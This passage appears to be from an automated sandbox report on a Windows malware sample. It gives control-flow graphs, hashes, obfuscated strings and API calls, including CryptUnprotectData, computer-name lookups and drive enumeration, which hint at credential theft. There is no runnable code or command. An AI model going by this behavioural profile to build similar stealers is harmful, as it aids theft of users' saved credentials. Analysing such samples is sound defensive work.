                                                                                                                                      • Opcode ID: 6fcae6a868640faa99ad6464bac92317f1cde9b25914f50047b4339ad2ac79e7
                                                                                                                                      • Instruction ID: bb3632e0dbde4e8d2b4a19a03613daa37f194cf2d7f33e2905a3bd121dbd54e2
                                                                                                                                      • Opcode Fuzzy Hash: 6fcae6a868640faa99ad6464bac92317f1cde9b25914f50047b4339ad2ac79e7
                                                                                                                                      • Instruction Fuzzy Hash: F732E172A083419FD314CF68C881B5BBBE6FFC5714F18892DE5949B281D778D906CB92

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 109 7b1be0-7b1c25 call 7cd760 112 7b1c2b-7b1c88 call 7a4d40 call 7c9a00 109->112 113 7b23ac-7b23bc 109->113 118 7b1c8a-7b1c8d 112->118 119 7b1c8f-7b1cd1 118->119 120 7b1cd3-7b1cd7 118->120 119->118 121 7b1cd9-7b1cdf 120->121 122 7b1ceb-7b1d04 121->122 123 7b1ce1-7b1ce6 121->123 125 7b1d0b-7b1d16 122->125 126 7b1d06 122->126 124 7b1da3-7b1da6 123->124 129 7b1daa-7b1db5 124->129 130 7b1da8 124->130 127 7b1d92-7b1d97 125->127 128 7b1d18-7b1d88 call 7cb5b0 125->128 126->127 134 7b1d99-7b1d9c 127->134 135 7b1da1 127->135 138 7b1d8d 128->138 131 7b1dbb-7b1dcb 129->131 132 7b22d3-7b2305 call 7c9a30 129->132 130->129 136 7b1dcd-7b1e00 131->136 143 7b2307-7b230a 132->143 134->121 135->124 139 7b1fdb 136->139 140 7b1e06-7b1e2e 136->140 138->127 144 7b1fdf-7b1fe2 139->144 142 7b1e30-7b1e33 140->142 145 7b1e6d-7b1e8b call 7b23c0 142->145 146 7b1e35-7b1e6b 142->146 147 7b230c-7b234e 143->147 148 7b2350-7b2354 143->148 149 7b1fe8-7b1ff9 call 7c9a00 144->149 150 7b1fe4-7b1fe6 144->150 145->139 164 7b1e91-7b1eba 145->164 146->142 147->143 153 7b2356-7b235c 148->153 161 7b200b-7b200d 149->161 162 7b1ffb-7b2006 149->162 154 7b200f-7b2011 150->154 159 7b235e 153->159 160 7b2360-7b2372 153->160 156 7b22b2-7b22b7 154->156 157 7b2017-7b2036 154->157 168 7b22b9-7b22bd 156->168 169 7b22bf-7b22c1 156->169 163 7b2038-7b203b 157->163 165 7b23a8 159->165 166 7b2376-7b237c 160->166 167 7b2374 160->167 161->154 170 7b22c5-7b22c9 162->170 171 7b207e-7b20ba 163->171 172 7b203d-7b207c 163->172 173 7b1ebc-7b1ebf 164->173 165->113 174 7b239c-7b239f 166->174 175 7b237e-7b2397 call 7cb5b0 166->175 167->174 176 7b22c3 168->176 169->176 170->136 181 7b22cf-7b22d1 170->181 177 7b20bc-7b20bf 171->177 172->163 178 7b1ec1-7b1f13 173->178 179 7b1f15-7b1f33 call 7b23c0 173->179 182 7b23a3-7b23a6 174->182 183 7b23a1 174->183 175->174 176->170 185 7b20c1-7b2103 177->185 186 7b2105-7b2109 177->186 178->173 192 7b1f3e-7b1f55 179->192 193 7b1f35-7b1f39 179->193 181->132 182->153 183->165 185->177 188 7b210b-7b2111 186->188 190 7b211d-7b2132 188->190 191 7b2113-7b2118 188->191 197 7b2139-7b2144 190->197 198 7b2134 190->198 196 7b21d9-7b21dc 191->196 194 7b1f59-7b1fd9 call 797f90 call 7a4980 call 797fa0 192->194 195 7b1f57 192->195 193->144 194->144 195->194 202 7b21de 196->202 203 7b21e0-7b21ff 196->203 199 7b21ca-7b21cd 197->199 200 7b214a-7b21c0 call 7cb5b0 197->200 198->199 206 7b21cf-7b21d2 199->206 207 7b21d7 199->207 209 7b21c5 200->209 202->203 208 7b2201-7b2204 203->208 206->188 207->196 211 7b2251-7b2257 208->211 212 7b2206-7b224f 208->212 209->199 214 7b2259-7b225d 211->214 215 7b2285-7b2288 211->215 212->208 218 7b225f-7b2266 214->218 216 7b228a-7b229b call 7c9a30 215->216 217 7b229d-7b22a3 215->217 221 7b22a5-7b22a8 216->221 217->221 222 7b2268-7b2274 218->222 223 7b2276-7b2279 218->223 221->156 228 7b22aa-7b22b0 221->228 222->218 224 7b227b 223->224 225 7b2281-7b2283 223->225 224->225 225->215 228->170
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeapInitializeThunk
                                                                                                                                      • String ID: !@$,$T$W$W$Z$\$\$]$^$e$g$i$k$l$o
                                                                                                                                      • API String ID: 383220839-1786846473
                                                                                                                                      • Opcode ID: f0f6ee7c61d323dddeea4e7baf1a073f3a5893c9185e4157469e69c394c1cd88
                                                                                                                                      • Instruction ID: 00e0573c42b5104a2f479f8b65907830bafd58b12eea4adb7fc68fa72387be18
                                                                                                                                      • Opcode Fuzzy Hash: f0f6ee7c61d323dddeea4e7baf1a073f3a5893c9185e4157469e69c394c1cd88
                                                                                                                                      • Instruction Fuzzy Hash: 9822CE7160D3808FD3249F78C4953AFBBE2AB85310F588A2DE5D687392D67D8846CB53

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 232 7c2950-7c2a3c GetSystemMetrics * 2 238 7c2a43-7c2c95 232->238
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MetricsSystem
                                                                                                                                      • String ID: $$W}$,W}$4W}$V}$V}
                                                                                                                                      • API String ID: 4116985748-3939036766
                                                                                                                                      • Opcode ID: e781021e72fad4a841635112d7e6fe632086fa805a2daae0e413a511b1ff44bf
                                                                                                                                      • Instruction ID: 2508e4028bdb72e072a411be9d14a2081823755924b4f753a5a4b1d35f5d4a7e
                                                                                                                                      • Opcode Fuzzy Hash: e781021e72fad4a841635112d7e6fe632086fa805a2daae0e413a511b1ff44bf
                                                                                                                                      • Instruction Fuzzy Hash: B9817DB451A7809FD360DF29D94878ABBF1BB85308F50992EE4888B350D7B99448CF93

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 241 7a60f8-7a60fb 242 7a6118 241->242 243 7a611e-7a6124 call 797fa0 241->243 244 7a643c 241->244 245 7a61bd-7a61d4 241->245 246 7a6111-7a6113 241->246 247 7a6196-7a61aa call 791000 241->247 248 7a6154-7a6174 call 797f90 call 7cdc10 241->248 249 7a61b4-7a61ba call 797fa0 241->249 250 7a6108-7a610e call 797fa0 241->250 251 7a6188 241->251 252 7a6368-7a636a 241->252 253 7a6102 241->253 254 7a6462-7a64cf 241->254 255 7a6127-7a614d call 7cdb10 241->255 242->243 243->255 256 7a61e0-7a623c 245->256 259 7a73cf-7a73d6 246->259 247->249 284 7a6179-7a6181 248->284 249->245 250->246 251->247 263 7a6370-7a6376 252->263 253->250 258 7a64d0-7a6531 254->258 255->244 255->245 255->247 255->248 255->249 255->251 255->252 255->254 256->256 266 7a623e-7a6246 256->266 258->258 268 7a6533-7a6557 call 791d90 258->268 263->263 272 7a6378-7a639a 263->272 275 7a628a-7a62ef call 791a50 266->275 276 7a6248-7a6257 266->276 268->254 288 7a644e-7a6453 268->288 289 7a6442-7a644b call 797fa0 268->289 290 7a6460 268->290 291 7a6687-7a668e 268->291 279 7a639c-7a639f 272->279 280 7a63a1 272->280 299 7a62f0-7a6341 275->299 281 7a6260-7a6267 276->281 279->280 285 7a63a2-7a63b2 279->285 280->285 286 7a6269-7a626c 281->286 287 7a6270-7a6276 281->287 284->244 284->245 284->247 284->249 284->251 284->252 284->254 293 7a63b9 285->293 294 7a63b4-7a63b7 285->294 286->281 296 7a626e 286->296 287->275 297 7a6278-7a6287 call 7cb5b0 287->297 288->290 289->288 290->254 298 7a66a4-7a66f0 call 7adad0 * 2 291->298 300 7a63ba-7a63d0 call 797f90 293->300 294->293 294->300 296->275 297->275 315 7a66f2-7a6709 call 7adad0 298->315 316 7a6690-7a669e 298->316 299->299 304 7a6343-7a6361 call 791d90 299->304 300->291 312 7a63d6-7a6435 call 7ccfe0 CryptUnprotectData 300->312 304->244 304->252 304->254 312->244 318 7a6779-7a677e 312->318 315->316 322 7a670b-7a6734 315->322 316->298 316->312 321 7a6780-7a6788 318->321 321->321 323 7a678a-7a679f 321->323 322->316 324 7a673a-7a6754 call 7adad0 322->324 325 7a67a8 323->325 326 7a67a1-7a67a6 323->326 324->316 332 7a675a-7a6774 324->332 327 7a67ab-7a67ef call 797f90 325->327 326->327 333 7a67f0-7a680f 327->333 332->316 333->333 334 7a6811-7a6819 333->334 335 7a681b-7a681e 334->335 336 7a6831-7a6841 334->336 337 7a6820-7a682f 335->337 338 7a6843-7a684a 336->338 339 7a6861-7a6877 call 798ac0 336->339 337->336 337->337 340 7a6850-7a685f 338->340 339->259 340->339 340->340
                                                                                                                                      APIs
                                                                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 007A642C
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CryptDataUnprotect
                                                                                                                                      • String ID: O$$&,?$?G?4$bdz$i|}$lfpu
                                                                                                                                      • API String ID: 834300711-4164664841
                                                                                                                                      • Opcode ID: d5d279a111d7c8fb65549a66ab91e518a78d97b98efc22a1fd579b6906b9885f
                                                                                                                                      • Instruction ID: 49931769f70ae87db7118c5740cae131ae9b045820e2ec5423757d3f299abd7b
                                                                                                                                      • Opcode Fuzzy Hash: d5d279a111d7c8fb65549a66ab91e518a78d97b98efc22a1fd579b6906b9885f
                                                                                                                                      • Instruction Fuzzy Hash: BDF106B2908391CFD724CF28D84566BB7E2BFD5314F198A2DE4D987252E738D905CB82

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 343 79abd0-79ac58 344 79ac60-79ac69 343->344 344->344 345 79ac6b-79ac7e 344->345 347 79ac8c-79aeb3 345->347 348 79af2c-79af33 345->348 349 79ac85-79ac87 345->349 350 79af35 345->350 352 79aec0-79af0e 347->352 353 79af3e-79af47 348->353 351 79af4a-79af51 349->351 350->353 352->352 354 79af10-79af25 352->354 353->351 354->348 354->350 356 79b159-79b169 354->356 357 79b059-79b05c 354->357 358 79b29b-79b304 call 797e70 354->358 359 79b1db-79b1e2 354->359 360 79afdc-79b002 354->360 361 79b071 354->361 362 79b170-79b179 354->362 363 79af52-79af5c 354->363 364 79b135-79b152 354->364 365 79b1e9-79b27c call 797e70 354->365 366 79b009-79b00d 354->366 367 79af88-79af91 354->367 368 79b0ea-79b0f2 354->368 369 79b04d-79b052 354->369 370 79b02f-79b037 call 7cb550 354->370 371 79b061-79b06a 354->371 372 79b1c3-79b1d6 354->372 356->357 356->360 356->362 356->366 356->369 356->370 356->372 384 79b1ab 357->384 408 79b30d 358->408 359->356 359->357 359->360 359->361 359->362 359->363 359->364 359->365 359->366 359->367 359->368 359->369 359->370 359->371 359->372 360->357 360->366 385 79b078-79b099 361->385 375 79b12a-79b133 362->375 376 79af7a-79af86 362->376 377 79b180-79b183 362->377 378 79b100 362->378 379 79b113-79b128 call 7ccfe0 362->379 380 79af63-79af78 call 7ccfe0 362->380 381 79b102-79b10c 362->381 382 79b185-79b1a0 call 7ccfe0 362->382 363->376 363->380 364->356 364->357 364->360 364->362 364->366 364->369 364->370 364->372 406 79b27e-79b284 365->406 407 79b285-79b294 365->407 398 79b016-79b028 366->398 374 79afa0-79afbe 367->374 368->378 369->357 369->366 399 79b03c-79b046 370->399 371->356 371->357 371->360 371->361 371->362 371->364 371->366 371->367 371->368 371->369 371->370 371->372 374->374 392 79afc0-79afc6 374->392 391 79b1b4-79b1be 375->391 390 79afcb-79afd7 376->390 396 79b1a2-79b1a9 377->396 379->375 380->376 381->375 381->376 381->379 381->380 382->396 384->391 400 79b0a0-79b0c1 385->400 390->353 391->390 392->385 396->384 398->357 398->360 398->366 398->369 398->370 399->357 399->360 399->366 399->369 400->400 405 79b0c3-79b0e3 400->405 405->356 405->357 405->360 405->362 405->364 405->366 405->368 405->369 405->370 405->372 406->407 407->358 408->408
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ,M&O$3E(G$5A1C$;I<K$D-y/$Q%H'$RK$X)J+$\=p?
                                                                                                                                      • API String ID: 0-2073365994
                                                                                                                                      • Opcode ID: cd2afae475f369a63d41a13adc4e30cb21383c53b33246469a0a9b6073eca688
                                                                                                                                      • Instruction ID: fe01b6255c6516e82ca55f8e9c3aa6fd214c71c25e5e583ea97499b8c39ac8ed
                                                                                                                                      • Opcode Fuzzy Hash: cd2afae475f369a63d41a13adc4e30cb21383c53b33246469a0a9b6073eca688
                                                                                                                                      • Instruction Fuzzy Hash: 63126AB1501B01CFD3348F25D885B97BBF1FB89314F148A1DD5AA8BBA1DB78A406CB94

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 415 7b3a00-7b3a56 416 7b3a60-7b3ab0 415->416 416->416 417 7b3ab2-7b3af8 416->417 419 7b3b00-7b3b30 417->419 419->419 420 7b3b32-7b3b3c 419->420 421 7b3b8b-7b3b97 420->421 422 7b3b7a 420->422 423 7b3e6a 420->423 424 7b3b98-7b3ba1 420->424 425 7b3e58-7b3e62 420->425 426 7b3cde-7b3ce7 420->426 427 7b3b43-7b3b49 420->427 428 7b3b82-7b3b88 call 797fa0 420->428 429 7b3e85-7b3f2f 420->429 430 7b3cc4-7b3cd7 420->430 422->428 433 7b3baa 424->433 434 7b3ba3-7b3ba8 424->434 425->423 437 7b3ce9-7b3cee 426->437 438 7b3cf0 426->438 439 7b3b4b-7b3b50 427->439 440 7b3b52 427->440 428->421 431 7b3f30-7b3f81 429->431 430->423 430->425 430->426 430->429 435 7b3e70-7b3e76 call 797fa0 430->435 436 7b3fa4-7b3fc1 430->436 431->431 441 7b3f83-7b3f94 call 7b1be0 431->441 444 7b3bb1-7b3bef call 797f90 433->444 434->444 459 7b3e7f 435->459 443 7b3fd0-7b3ff5 436->443 445 7b3cf7-7b3da3 call 797f90 437->445 438->445 446 7b3b55-7b3b73 call 797f90 439->446 440->446 454 7b3f99-7b3f9c 441->454 443->443 449 7b3ff7-7b4077 443->449 461 7b3bf0-7b3c42 444->461 462 7b3db0-7b3dd8 445->462 446->421 446->422 446->423 446->424 446->425 446->426 446->428 446->429 446->430 455 7b4080-7b40d6 449->455 454->436 455->455 460 7b40d8-7b40f9 call 7b1740 455->460 459->429 478 7b4101 460->478 461->461 466 7b3c44-7b3c4c 461->466 462->462 463 7b3dda-7b3de2 462->463 469 7b3e01-7b3e0d 463->469 470 7b3de4-7b3deb 463->470 467 7b3c4e-7b3c53 466->467 468 7b3c71-7b3c7d 466->468 472 7b3c60-7b3c6f 467->472 474 7b3c7f-7b3c83 468->474 475 7b3ca1-7b3cac call 7cd920 468->475 476 7b3e0f-7b3e13 469->476 477 7b3e31-7b3e51 GetLogicalDrives call 7cd920 469->477 473 7b3df0-7b3dff 470->473 472->468 472->472 473->469 473->473 479 7b3c90-7b3c9f 474->479 483 7b3cb1-7b3cbd 475->483 480 7b3e20-7b3e2f 476->480 477->421 477->423 477->425 477->428 477->435 477->436 477->459 477->478 485 7b4107-7b4110 call 797fa0 477->485 478->485 479->475 479->479 480->477 480->480 483->423 483->425 483->426 483->429 483->430 483->435 483->436
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: '\$+,$JJ$z{$RT
                                                                                                                                      • API String ID: 0-1188437889
                                                                                                                                      • Opcode ID: e73633a68980eadc60a28eea3fd27c831502852cc01f0044d2998cb81c6a0c79
                                                                                                                                      • Instruction ID: 90aebc379ba4ff79c736fff37e1b149737e20f8044b0eda166240eb2110900a3
                                                                                                                                      • Opcode Fuzzy Hash: e73633a68980eadc60a28eea3fd27c831502852cc01f0044d2998cb81c6a0c79
                                                                                                                                      • Instruction Fuzzy Hash: 8F02FDB1609340CFD704DF68D8917ABBBE1EF81300F05896DE5968B395E7B89906CB86

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 488 7bdaaf-7bdbc6 call 7ccfe0 491 7bdbcb-7bdc14 GetComputerNameExA 488->491 492 7bdc20-7bdc3a 491->492 492->492 493 7bdc3c-7bdc46 492->493 494 7bdc5b-7bdc68 493->494 495 7bdc48-7bdc4f 493->495 497 7bdc8b-7bdce4 GetComputerNameExA 494->497 498 7bdc6a-7bdc71 494->498 496 7bdc50-7bdc59 495->496 496->494 496->496 500 7bdcf0-7bdd45 497->500 499 7bdc80-7bdc89 498->499 499->497 499->499 500->500 501 7bdd47-7bdd51 500->501 502 7bdd7d-7bdd80 501->502 503 7bdd53-7bdd61 501->503 504 7bdd84-7bdd91 502->504 505 7bdd70-7bdd79 503->505 507 7bddab-7bddff 504->507 508 7bdd93-7bdd9a 504->508 505->505 506 7bdd7b 505->506 506->504 511 7bde00-7bde36 507->511 509 7bdda0-7bdda9 508->509 509->507 509->509 511->511 512 7bde38-7bde42 511->512 513 7bde5d 512->513 514 7bde44-7bde4f 512->514 516 7bde5f-7bde6c 513->516 515 7bde50-7bde59 514->515 515->515 517 7bde5b 515->517 518 7bde8b-7bdee6 call 7ccfe0 516->518 519 7bde6e-7bde75 516->519 517->516 524 7bdef0-7bdf14 518->524 520 7bde80-7bde89 519->520 520->518 520->520 524->524 525 7bdf16-7bdf20 524->525 526 7bdf3b-7bdf4b 525->526 527 7bdf22-7bdf29 525->527 529 7be079-7be0b3 526->529 530 7bdf51-7bdf5a 526->530 528 7bdf30-7bdf39 527->528 528->526 528->528 532 7be0c0-7be0f5 529->532 531 7bdf60-7bdf6a 530->531 533 7bdf6c-7bdf71 531->533 534 7bdf80-7bdf86 531->534 532->532 535 7be0f7-7be103 532->535 536 7be020-7be024 533->536 539 7bdf88-7bdf8b 534->539 540 7bdfb0-7bdfbf 534->540 537 7be11b-7be11e call 7c0f30 535->537 538 7be105-7be10f 535->538 543 7be026-7be02e 536->543 550 7be123-7be13f 537->550 544 7be110-7be119 538->544 539->540 546 7bdf8d-7bdfa2 539->546 541 7be03a-7be042 540->541 542 7bdfc1-7bdfc4 540->542 541->543 549 7be044-7be047 541->549 542->541 547 7bdfc6-7be017 542->547 543->529 548 7be030-7be032 543->548 544->537 544->544 546->536 547->536 548->531 551 7be038 548->551 552 7be049-7be073 549->552 553 7be075-7be077 549->553 551->529 552->536 553->529 553->536
                                                                                                                                      APIs
                                                                                                                                      • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 007BDBEF
                                                                                                                                      • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 007BDCAD
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ComputerName
                                                                                                                                      • String ID: %1$6$K$]^U\
                                                                                                                                      • API String ID: 3545744682-2151241452
                                                                                                                                      • Opcode ID: 288e3d6eabafb52fca28987dc00b15dfe78d3e24a6e7920f96a864b6493bf25a
                                                                                                                                      • Instruction ID: 1dee55e9d7c7b71f90502bfeb7e5ccb3e8d2ddebb6013b8a8a6eb6596fe69dc2
                                                                                                                                      • Opcode Fuzzy Hash: 288e3d6eabafb52fca28987dc00b15dfe78d3e24a6e7920f96a864b6493bf25a
                                                                                                                                      • Instruction Fuzzy Hash: C9D1D06121C3818ED7358F3884517FBBBD1ABA7304F18896DD4C98B383E779894AD752

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 554 7bdab4-7bdb0a call 7ccfe0 558 7bdb10-7bdb53 554->558 558->558 559 7bdb55-7bdb5f 558->559 560 7bdb7d 559->560 561 7bdb61-7bdb6a 559->561 562 7bdb7f-7bdb93 560->562 563 7bdb70-7bdb79 561->563 565 7bdbab-7bdc14 call 7ccfe0 GetComputerNameExA 562->565 566 7bdb95-7bdb9f 562->566 563->563 564 7bdb7b 563->564 564->562 571 7bdc20-7bdc3a 565->571 567 7bdba0-7bdba9 566->567 567->565 567->567 571->571 572 7bdc3c-7bdc46 571->572 573 7bdc5b-7bdc68 572->573 574 7bdc48-7bdc4f 572->574 576 7bdc8b-7bdce4 GetComputerNameExA 573->576 577 7bdc6a-7bdc71 573->577 575 7bdc50-7bdc59 574->575 575->573 575->575 579 7bdcf0-7bdd45 576->579 578 7bdc80-7bdc89 577->578 578->576 578->578 579->579 580 7bdd47-7bdd51 579->580 581 7bdd7d-7bdd80 580->581 582 7bdd53-7bdd61 580->582 583 7bdd84-7bdd91 581->583 584 7bdd70-7bdd79 582->584 586 7bddab-7bddff 583->586 587 7bdd93-7bdd9a 583->587 584->584 585 7bdd7b 584->585 585->583 590 7bde00-7bde36 586->590 588 7bdda0-7bdda9 587->588 588->586 588->588 590->590 591 7bde38-7bde42 590->591 592 7bde5d 591->592 593 7bde44-7bde4f 591->593 595 7bde5f-7bde6c 592->595 594 7bde50-7bde59 593->594 594->594 596 7bde5b 594->596 597 7bde8b-7bdee6 call 7ccfe0 595->597 598 7bde6e-7bde75 595->598 596->595 603 7bdef0-7bdf14 597->603 599 7bde80-7bde89 598->599 599->597 599->599 603->603 604 7bdf16-7bdf20 603->604 605 7bdf3b-7bdf4b 604->605 606 7bdf22-7bdf29 604->606 608 7be079-7be0b3 605->608 609 7bdf51-7bdf5a 605->609 607 7bdf30-7bdf39 606->607 607->605 607->607 611 7be0c0-7be0f5 608->611 610 7bdf60-7bdf6a 609->610 612 7bdf6c-7bdf71 610->612 613 7bdf80-7bdf86 610->613 611->611 614 7be0f7-7be103 611->614 615 7be020-7be024 612->615 618 7bdf88-7bdf8b 613->618 619 7bdfb0-7bdfbf 613->619 616 7be11b-7be11e call 7c0f30 614->616 617 7be105-7be10f 614->617 622 7be026-7be02e 615->622 629 7be123-7be13f 616->629 623 7be110-7be119 617->623 618->619 625 7bdf8d-7bdfa2 618->625 620 7be03a-7be042 619->620 621 7bdfc1-7bdfc4 619->621 620->622 628 7be044-7be047 620->628 621->620 626 7bdfc6-7be017 621->626 622->608 627 7be030-7be032 622->627 623->616 623->623 625->615 626->615 627->610 630 7be038 627->630 631 7be049-7be073 628->631 632 7be075-7be077 628->632 630->608 631->615 632->608 632->615
                                                                                                                                      APIs
                                                                                                                                      • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 007BDBEF
                                                                                                                                      • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 007BDCAD
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ComputerName
                                                                                                                                      • String ID: %1$6$K$]^U\
                                                                                                                                      • API String ID: 3545744682-2151241452
                                                                                                                                      • Opcode ID: 9165fbaa6f7758227bd41232c22d84f4ed4d84212f91e888fe0edbf19418346c
                                                                                                                                      • Instruction ID: 275bbaa4b4c8d6c9fdfe27cc99bd34e9abed2ea4ad22077b421daf7fc01484b5
                                                                                                                                      • Opcode Fuzzy Hash: 9165fbaa6f7758227bd41232c22d84f4ed4d84212f91e888fe0edbf19418346c
                                                                                                                                      • Instruction Fuzzy Hash: 5CD1E26011C3D08AD7358F3984617FBBBE19FA3304F1889ADD4C99B283EB794905CB62

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
